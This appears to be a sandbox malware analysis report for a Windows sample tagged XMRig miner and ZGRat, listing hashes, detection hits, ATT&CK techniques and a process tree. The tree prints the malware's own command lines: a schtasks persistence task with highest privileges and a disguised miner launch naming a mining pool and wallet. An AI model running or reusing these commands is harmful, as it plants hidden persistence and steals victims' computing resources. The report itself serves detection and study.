xmrig | 0ec4dc59bfa704ff0777038d4c747fb42db308bed43f2ad6a681b645d1bfecbd

Analysis

max time kernel
1041s
max time network
1197s
platform
windows10-1703_x64
resource
win10-20231220-en
resource tags

arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system
submitted
26-01-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Size

5.6MB
MD5

1a27bd843a09f923661a15300e02d703
SHA1

5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA256

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512

330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
SSDEEP

49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score

10^/10

xmrig zgrat miner rat upx

Malware Config

Signatures

Detect ZGRat V1 5 IoCs

Processes:

resource	yara_rule
behavioral9/memory/3320-0-0x00000000000E0000-0x0000000000680000-memory.dmp	family_zgrat_v1
behavioral9/files/0x000700000001abd8-13.dat	family_zgrat_v1
behavioral9/files/0x000700000001abd8-12.dat	family_zgrat_v1
behavioral9/files/0x000700000001abd8-44.dat	family_zgrat_v1
behavioral9/files/0x000700000001abd8-139.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 43 IoCs

miner

Processes:

resource	yara_rule
behavioral9/memory/2616-21-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-22-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-26-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-25-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-28-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-32-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-33-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2616-41-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-54-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-55-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-56-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-57-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-59-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-62-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-64-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-65-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-66-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/4344-67-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2624-84-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2624-85-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2624-87-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2624-86-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2624-88-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2624-92-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/2624-93-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1108-107-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1108-108-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1108-109-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1108-110-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1108-111-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1108-115-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1108-116-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1952-130-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1952-131-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1952-133-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/1952-138-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral9/memory/972-159-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 5 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral9/memory/3320-0-0x00000000000E0000-0x0000000000680000-memory.dmp	net_reactor
behavioral9/files/0x000700000001abd8-13.dat	net_reactor
behavioral9/files/0x000700000001abd8-12.dat	net_reactor
behavioral9/files/0x000700000001abd8-44.dat	net_reactor
behavioral9/files/0x000700000001abd8-139.dat	net_reactor

Executes dropped EXE 6 IoCs

Processes:

.exe.exe.exe.exe.exe.exe

pid	Process
3000	.exe
4396	.exe
3412	.exe
1004	.exe
384	.exe
432	.exe

UPX packed file 50 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral9/memory/2616-19-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-17-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-20-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-21-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-22-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-33-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2616-41-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-54-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-55-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-56-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-57-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-59-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-62-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-64-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-65-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-66-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/4344-67-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-81-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-84-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-85-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-87-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-86-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-88-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-92-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/2624-93-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-104-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-107-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-108-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-109-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-110-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-111-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-115-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1108-116-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1952-127-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1952-130-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1952-131-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1952-133-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/1952-138-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/972-148-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral9/memory/972-159-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 5 IoCs

Processes:

.exe.exe.exe.exe.exe

description	pid	Process	procid_target
PID 3000 set thread context of 2616	3000	.exe	82
PID 4396 set thread context of 4344	4396	.exe	88
PID 3412 set thread context of 2624	3412	.exe	94
PID 1004 set thread context of 1108	1004	.exe	100
PID 384 set thread context of 1952	384	.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
3408	schtasks.exe
3124	schtasks.exe
3876	schtasks.exe
920	schtasks.exe
1668	schtasks.exe
3308	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
3108	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

.exe.exe.exe.exe.exe.exe

pid	Process
3000	.exe
4396	.exe
3412	.exe
1004	.exe
384	.exe
432	.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exe

description	pid	Process
Token: SeDebugPrivilege	3320	PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
Token: SeDebugPrivilege	3000	.exe
Token: SeLockMemoryPrivilege	2616	vbc.exe
Token: SeLockMemoryPrivilege	2616	vbc.exe
Token: SeDebugPrivilege	4396	.exe
Token: SeLockMemoryPrivilege	4344	vbc.exe
Token: SeLockMemoryPrivilege	4344	vbc.exe
Token: SeDebugPrivilege	3412	.exe
Token: SeLockMemoryPrivilege	2624	vbc.exe
Token: SeLockMemoryPrivilege	2624	vbc.exe
Token: SeDebugPrivilege	1004	.exe
Token: SeLockMemoryPrivilege	1108	vbc.exe
Token: SeLockMemoryPrivilege	1108	vbc.exe
Token: SeDebugPrivilege	384	.exe
Token: SeLockMemoryPrivilege	1952	vbc.exe
Token: SeLockMemoryPrivilege	1952	vbc.exe
Token: SeDebugPrivilege	432	.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

vbc.exevbc.exevbc.exevbc.exevbc.exe

pid	Process
2616	vbc.exe
4344	vbc.exe
2624	vbc.exe
1108	vbc.exe
1952	vbc.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

PV0HLG9QQ3YXXG1AJAMYRYE08NU.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.exe

description	pid	Process	procid_target
PID 3320 wrote to memory of 3376	3320	PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe	75
PID 3320 wrote to memory of 3376	3320	PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe	75
PID 3376 wrote to memory of 3108	3376	cmd.exe	76
PID 3376 wrote to memory of 3108	3376	cmd.exe	76
PID 3376 wrote to memory of 3000	3376	cmd.exe	77
PID 3376 wrote to memory of 3000	3376	cmd.exe	77
PID 3000 wrote to memory of 3824	3000	.exe	79
PID 3000 wrote to memory of 3824	3000	.exe	79
PID 3824 wrote to memory of 3876	3824	cmd.exe	80
PID 3824 wrote to memory of 3876	3824	cmd.exe	80
PID 3000 wrote to memory of 2616	3000	.exe	82
PID 3000 wrote to memory of 2616	3000	.exe	82
PID 3000 wrote to memory of 2616	3000	.exe	82
PID 3000 wrote to memory of 2616	3000	.exe	82
PID 3000 wrote to memory of 2616	3000	.exe	82
PID 3000 wrote to memory of 2616	3000	.exe	82
PID 3000 wrote to memory of 2616	3000	.exe	82
PID 4396 wrote to memory of 3576	4396	.exe	84
PID 4396 wrote to memory of 3576	4396	.exe	84
PID 3576 wrote to memory of 920	3576	cmd.exe	87
PID 3576 wrote to memory of 920	3576	cmd.exe	87
PID 4396 wrote to memory of 4344	4396	.exe	88
PID 4396 wrote to memory of 4344	4396	.exe	88
PID 4396 wrote to memory of 4344	4396	.exe	88
PID 4396 wrote to memory of 4344	4396	.exe	88
PID 4396 wrote to memory of 4344	4396	.exe	88
PID 4396 wrote to memory of 4344	4396	.exe	88
PID 4396 wrote to memory of 4344	4396	.exe	88
PID 3412 wrote to memory of 4972	3412	.exe	90
PID 3412 wrote to memory of 4972	3412	.exe	90
PID 4972 wrote to memory of 1668	4972	cmd.exe	93
PID 4972 wrote to memory of 1668	4972	cmd.exe	93
PID 3412 wrote to memory of 2624	3412	.exe	94
PID 3412 wrote to memory of 2624	3412	.exe	94
PID 3412 wrote to memory of 2624	3412	.exe	94
PID 3412 wrote to memory of 2624	3412	.exe	94
PID 3412 wrote to memory of 2624	3412	.exe	94
PID 3412 wrote to memory of 2624	3412	.exe	94
PID 3412 wrote to memory of 2624	3412	.exe	94
PID 1004 wrote to memory of 3260	1004	.exe	96
PID 1004 wrote to memory of 3260	1004	.exe	96
PID 3260 wrote to memory of 3308	3260	cmd.exe	99
PID 3260 wrote to memory of 3308	3260	cmd.exe	99
PID 1004 wrote to memory of 1108	1004	.exe	100
PID 1004 wrote to memory of 1108	1004	.exe	100
PID 1004 wrote to memory of 1108	1004	.exe	100
PID 1004 wrote to memory of 1108	1004	.exe	100
PID 1004 wrote to memory of 1108	1004	.exe	100
PID 1004 wrote to memory of 1108	1004	.exe	100
PID 1004 wrote to memory of 1108	1004	.exe	100
PID 384 wrote to memory of 3200	384	.exe	102
PID 384 wrote to memory of 3200	384	.exe	102
PID 3200 wrote to memory of 3408	3200	cmd.exe	105
PID 3200 wrote to memory of 3408	3200	cmd.exe	105
PID 384 wrote to memory of 1952	384	.exe	106
PID 384 wrote to memory of 1952	384	.exe	106
PID 384 wrote to memory of 1952	384	.exe	106
PID 384 wrote to memory of 1952	384	.exe	106
PID 384 wrote to memory of 1952	384	.exe	106
PID 384 wrote to memory of 1952	384	.exe	106
PID 384 wrote to memory of 1952	384	.exe	106
PID 432 wrote to memory of 4928	432	.exe	108
PID 432 wrote to memory of 4928	432	.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe
"C:\Users\Admin\AppData\Local\Temp\PV0HLG9QQ3YXXG1AJAMYRYE08NU.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp73F7.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3376
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3108
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3824
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3876
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2616

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4396
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3576
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:920
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4344

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1668
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2624

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3260
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3308
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1108

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:384
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3408
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1952

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  PID:4928
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3124
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  PID:972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
3.4MB

MD5
75bf5aac671eefb7d9ee44cab3a7d54b

SHA1
dde5f1534d45030c543d685be0b1c5e80e0e34a6

SHA256
205c92c57ffa0b74f5a21a9b554d82516470f2f5de37879de1e19ddae8f9a173

SHA512
00cf83ac7e10f515752dc7928cab5b9738f53645eeba35776fa4f86dca16d8c9211ad57a2124d47a9f0b9e38cdf32a8d25bba458d894cf936f71e10cf9eb7f5c

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
3.2MB

MD5
14dce81decb3bc5a6ef9653a3cb4e7b2

SHA1
d96b109599b5c47ce95003e68ca7431c43a17dc2

SHA256
9dd65f52d98ff918a686a0db486ebe41d3542dbd73e1ec266c73d6760c2aca79

SHA512
1b215dadfb3f2fa1ab7ec97aec0b3e4db4000da8f8e3abef21c584346bf49b5bac98313d66accb3e6759c0b719b90909b073ef86d4d40665bbfc05460fbddfe7

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
265KB

MD5
32c1266fb0679f1cf1fcdf468afb7537

SHA1
47cf213a5b83967a12cd4157c3ae9b3e935ad2c0

SHA256
f722ef6fc83ea8ff40f6a277589d4d169ab6a308b8df0a25147f61ef2280f99f

SHA512
ba18cab973b85644ce3cd3ed322f68fd2d2a69171e8bafcd4913ab155b835d85f0df1f1ac92b71161c5ab708c163c48450759a6801beabb56dc74f0087345a44

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.6MB

MD5
1a27bd843a09f923661a15300e02d703

SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log

Filesize
1KB

MD5
99e47c178875de9fe1675fe5ba0e1f42

SHA1
c28934210fbe9d2ee90e751b8cf21be297b3d171

SHA256
773f7a03c7b56de09b71249ce4920458ef67fda14b923df1d5ebc1725101b9ff

SHA512
7a4b79273bbc4b5966680a48d63115feed3ae48dfc0ea2a7a11e202d06d9ecab2b4b1b8e2a3d1eb9e9b35169cf9ca866f785875e19e5eeadfe11b54500c05f4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp73F7.tmp.bat

Filesize
168B

MD5
755e94f99ee67817d1328aa6763a8988

SHA1
f3cb5033b6ebc044cccbbcca31d2b599956b2188

SHA256
051d8f03b3305f766c8582b6966ec061c0fee29db5034edb5f4aedd87a7d1a58

SHA512
623174f516cd6a29afb26d0d4eecc134de6bb04c59c1e0c858cf13ea8e259bf037d694027b66d5b30fb8eb8c1011d7fef9528563d48142c8b90909c19e9b07e8

Download Submit
memory/384-119-0x00007FFBE9830000-0x00007FFBEA21C000-memory.dmp

Filesize
9.9MB

Download
memory/384-120-0x0000000003FF0000-0x0000000004000000-memory.dmp

Filesize
64KB

Download
memory/384-121-0x0000000001E80000-0x0000000001E81000-memory.dmp

Filesize
4KB

Download
memory/384-122-0x00007FFBE9830000-0x00007FFBEA21C000-memory.dmp

Filesize
9.9MB

Download
